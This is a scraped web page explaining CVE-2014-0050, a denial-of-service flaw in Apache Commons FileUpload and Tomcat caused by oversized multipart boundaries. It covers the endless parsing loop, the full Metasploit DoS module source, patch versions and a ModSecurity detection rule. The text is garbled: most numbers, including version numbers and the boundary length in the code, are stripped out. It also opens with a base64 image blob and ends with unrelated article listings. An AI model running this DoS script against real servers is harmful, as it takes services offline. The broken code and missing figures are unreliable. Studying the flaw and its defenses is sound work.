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f+vEHy67xN92C3WTJQ+6J95kUdFp9GSbN8ztHTMVrVtc2KS1q5Efn1dvupjHu3661k1f0dnltf582T7N6jnf2LiIh8PopMRaYiM5rzM4rMaaZ+15Lfd2vP3XB/V618d3prm80nc/j9FRFZm+nqzdM/rl+IjcvXe+wtGnR/fQVPuMWjtD1SGSgautug+GWl2eJ1Uo0NR8mnGs0kL0SSamDVKMM1z5flPtdbSXJ1wzdMNMO174RVk6zcERERkftnWP61z/f5U29YNiSFRDJQNHS3QfHLSrPF652lxeeLruIowzXPl+U+11tJcnXDN0w0w7XvhFWTrNyRPZ3n17t4HY1eXKv2znYPtvd37dtvOL2oWXfOq5ZRROSMTFdvnv5x/UJsWbtC0fD+btQsf/YUHwlTI5peMtzmJ1z7ujLc8ALXnjuc8LDaWztK0sPa8uKS660kubpKxTbss7IyqyZZuSMiIiI3jyIz6lCRqciszLDSeO0kK3dkT+fF652PW1mZ4hujONbat9/+3/sblktE5LxMV2+e/nH9QmxfwdGndveRUCyJioVR0v7z1e2qJ2ulLtlz7rA4W1uiHVvdXnW93ZJreLvzGRarvfrV1euhbdXtqiFEREQ+H0Vmcc6KzPtcryKzPkTxN0J33KPOrdzf+RWtWvl8Afevc9KhiMhJma7ePP3j+oU4d5VnoiOL48mRaIhX/JyLhp5/Nxq6exX5heRDdBcnX5Z8MvlaTT3dlXk1D+zoKqKek3Fvdb3dEYtv3XahojknM4zewElXw+lN8T1KlrSyCCIiIrdN+6ROnt2VQqI7xGv2pO6WFu3QbeGRPIW7zZIToyG6i5MvSz6ZfK2mnu7KvH6WOslVRD0n497qersjFt+67UJFc05mGL2Bk66G05vie5QsabH/+rK0I3bHPerc9svKzCsLmDerzzm64yIi58UWquzK855ba6/oS1dgz7R3XnJen31yYb/03omIiPyGPO8xrcg8+5J/T5G52G08+3LumV974SJyYWyhyvZEdcnvyTeuwJ4Jf+Z6nzGEiIiIbM43llhWQJH5mSE+uWIiIjKPLVQRERERERERERGRMLZQRURERERERERERMLYQhUREREREREREREJYwtVREREREREREREJIwtVBERERF5Zv7v/xUREREROSC2UEVERETkmbm81BYRERGRZ8QWqoickm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" alt="" />

The fixed code has an extra "if" condition (line number 330) that validates the length of the multipart boundary to be shorter than 4091 characters, raising an exception if that's not the case. The calculation is as follows:

boundary.length > bufSize –  – BOUNDARY_PREFIX.length =  –  –  =

//parts of the code were copied into the org.apache.tomcat.util.http.fileupload package in Apache Tomcat, causing it to be affected.

0x2: Creating the exploit

So let's get Apache Tomcat installed and try to send more than 4091 characters in the boundary field to the Apache Tomcat Manager application. Such a request might look like this:

0x3: Why is this happening

While parsing the multipart message, the following "for" loop is used by the MultipartStream class:

The innocent-looking "for" loop above is an endless loop. It is "family related" to the famous "while(true)" loop. The developer's intention was to exit this loop either by raising an exception (line 1003) or by returning a value (line 1014), unfortunately when the boundary is longer than 4091 characters (as explained earlier) and the body is longer than 4096 characters (so it can potentially contain the boundary), neither would ever occur

Relevant Link:

https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2014-0050--Exploit-with-Boundaries,-Loops-without-Boundaries/

3. POC

0x1: Metasploit

msf > use auxiliary/dos/http/apache_commons_fileupload_dos

msf auxiliary(apache_commons_fileupload_dos) > show actions

    ...actions...

msf auxiliary(apache_commons_fileupload_dos) > set ACTION <action-name>

msf auxiliary(apache_commons_fileupload_dos) > show options

    ...show and set options...

msf auxiliary(apache_commons_fileupload_dos) > run

0x2: apache_commons_fileupload_dos.rb

##

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit4 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  include Msf::Auxiliary::Dos

  def initialize(info = {})

    super(update_info(info,

      'Name'            => 'Apache Commons FileUpload and Apache Tomcat DoS',

      'Description'     => %q{

        This module triggers an infinite loop in Apache Commons FileUpload 1.0

        through 1.3 via a specially crafted Content-Type header.

        Apache Tomcat  and Apache Tomcat  use a copy of FileUpload to handle

        mime-multipart requests, therefore, Apache Tomcat 7.0. through 7.0.

        and 8.0.-RC1 through 8.0. are affected by this issue. Tomcat  also

        uses Commons FileUpload as part of the Manager application.

       },

       'Author'         =>

         [

           'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.

           'ribeirux' # metasploit module

         ],

       'License'        => MSF_LICENSE,

       'References'     =>

         [

           ['CVE', '2014-0050'],

           ['URL', 'http://tomcat.apache.org/security-8.html'],

           ['URL', 'http://tomcat.apache.org/security-7.html']

         ],

        'DisclosureDate' => 'Feb 6 2014'

      ))

      register_options(

        [

          Opt::RPORT(),

          OptString.new('TARGETURI', [ true,  "The request URI", '/']),

          OptInt.new('RLIMIT', [ true,  "Number of requests to send",])

        ], self.class)

  end

  def run

    boundary = ""*

    opts = {

      'method'         => "POST",

      'uri'            => normalize_uri(target_uri.to_s),

      'ctype'          => "multipart/form-data; boundary=#{boundary}",

      'data'           => "#{boundary}00000",

      'headers' => {

        'Accept' => '*/*'

      }

    }

    # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby

    # This should be rewritten with .upto() or Enumerable#each or

    # something

    for x in ..datastore['RLIMIT']

      print_status("Sending request #{x} to #{peer}")

      begin

        c = connect

        r = c.request_cgi(opts)

        c.send_request(r)

        # Don't wait for a response

      rescue ::Rex::ConnectionError => exception

        print_error("#{peer} - Unable to connect: '#{exception.message}'")

        return

      ensure

        disconnect(c) if c

      end

    end

  end

end

Relevant Link:

https://www.rapid7.com/db/modules/auxiliary/dos/http/apache_commons_fileupload_dos

https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb

4. Solution

0x1: Defend yourself 

. Once available, update your software to one of the following versions:

Apache Commons FileUpload 1.3.

Apache Tomcat 7.0.

Apache Tomcat 8.0.

. You may choose to apply the appropriate patch:

Apache Commons FileUpload: http://svn.apache.org/r1565143

Apache Tomcat : http://svn.apache.org/r1565163

Apache Tomcat : http://svn.apache.org/r1565169

0x2: ModSecurity Commercial Rule Set

SecRule REQUEST_HEADERS:Content-Type "@rx .{4000}"

Relevant Link:

http://tomcat.apache.org/security-7.html

Copyright (c) 2015 Little5ann All rights reserved

CVE-2014-0050: Exploit with Boundaries, Loops without Boundaries、Apache Commons FileUpload and Apache Tomcat DoS的更多相关文章

  1. <2014 08 29> MATLAB的软件结构与模块、工具箱简示

    MATLAB的系统结构:三个层次.九个部分 ----------------------------------- 一.基础层 是整个系统的基础,核心内容是MATLAB部分. 1.软件主包MATLAB ...

  2. 2014.1.21 DNS大事故(dns原理、网络封锁原理)

    1.21那天发生了什么,由1.21联想补充……  很多网站都上不去,域名解析都到了65.49.2.178这个IP地址 先科普,再深挖  dns查询类型 递归查询,迭代查询   DNS解析过程,这里使用 ...

  3. 小白日记15:kali渗透测试之弱点扫描-漏扫三招、漏洞管理、CVE、CVSS、NVD

    发现漏洞 弱点发现方法: 1.基于端口服务扫描结果版本信息,比对其是否为最新版本,若不是则去其 官网查看其补丁列表,然后去逐个尝试,但是此法弊端很大,因为各种端口应用比较多,造成耗时大. 2.搜索已公 ...

  4. fastjson反序列化漏洞原理及利用

    重要漏洞利用poc及版本 我是从github上的参考中直接copy的exp,这个类就是要注入的类 import java.lang.Runtime; import java.lang.Process; ...

  5. J2EE项目开发中常用到的公共方法

    在项目IDCM中涉及到多种工单,包括有:服务器|网络设备上下架工单.服务器|网络设备重启工单.服务器光纤网线更换工单.网络设备撤线布线工单.服务器|网络设备替换工单.服务器|网络设备RMA工单.通用原 ...

  6. J2EE相关总结

    Java Commons The Java™ Tutorials: http://docs.oracle.com/javase/tutorial/index.html Java Platform, E ...

  7. DatagramChannel

    DatagramChannel 最后一个socket通道是DatagramChannel.正如SocketChannel对应Socket,ServerSocketChannel对应ServerSock ...

  8. Servlet实现文件上传

    一.Servlet实现文件上传,需要添加第三方提供的jar包 下载地址: 1) commons-fileupload-1.2.2-bin.zip      :   点击打开链接 2) commons- ...

  9. 使用jetty和mongodb实现简易网盘接口

    依赖库: 1,jetty(提供http方式接口) 2,mongodb的java驱动(访问mongodb存取文件) 3,thumbnailator包,进行缩略图生成 4,commons-fileuplo ...

随机推荐

  1. android中按电源键锁屏然后解锁导致Activity调用onDestory以及如何防止锁屏

    今天在android项目中按电源键锁屏,然后解锁,发现子Activity关闭了,回到了主页,这个问题困扰了我很久,最后打log发现,在按电源键的时候,调用了子Activity的onDestroy()方 ...

  2. NOI2018准备 Day11

    今天7点半到9点我都不知道自己在干啥, 一共A了3道题,2道钻石,1道大师. 下午调一道线段树3个小时没调出来,一个单调栈2小时没搞出来...... 学了个算法:求极大子矩阵. 昨天定的目标是学指针, ...

  3. SQL Server 用SSMS查看依赖关系有时候不准确,改用代码查

    SQL Server 用SSMS查看依赖关系有时候不准确,明明某个sp中有用到表tohen,查看表tohen的依赖关系的时候,却看不到这个sp 用代码查看方式如下: --依赖于表tohen的对象 SE ...

  4. node基础06:回调函数

    1.Node异步编程 Node.js 异步编程的直接体现就是回调. 异步编程依托于回调来实现,但不能说使用了回调后程序就异步化了. 回调函数在完成任务后就会被调用,Node 使用了大量的回调函数,No ...

  5. java:读/写配置文件

    package jimmy; import java.io.*; import java.util.Properties; public class Program { public static v ...

  6. spring注解scheduled实现定时任务

    只想说,spring注解scheduled实现定时任务使用真的非常简单. 一.配置spring.xml文件 1.在beans加入xmlns:task="http://www.springfr ...

  7. PAT 1067. Sort with Swap(0,*)

    1067. Sort with Swap(0,*) (25)   Given any permutation of the numbers {0, 1, 2,..., N-1}, it is easy ...

  8. 继续node爬虫 — 百行代码自制自动AC机器人日解千题攻占HDOJ

    前言 不说话,先猛戳 Ranklist 看我排名. 这是用 node 自动刷题大概半天的 "战绩",本文就来为大家简单讲解下如何用 node 做一个 "自动AC机&quo ...

  9. 前端备忘录 — IE 的条件注释

    CSS hack 由于不同厂商的浏览器,比如 Internet Explorer,Safari,Mozilla Firefox, Chrome 等,或者是同一厂商的浏览器的不同版本,如 IE6 和 I ...

  10. 【前端也要学点算法】 归并排序的JavaScript实现

    前文我们了解了快速排序算法的实现,本文我们来了解下另一种流行的排序算法-归并排序算法. 我们先来回顾下快排.快排的核心是找出一个基准元素,把数组中比该元素小的放到左边数组,比该元素大的放到右边数组,如 ...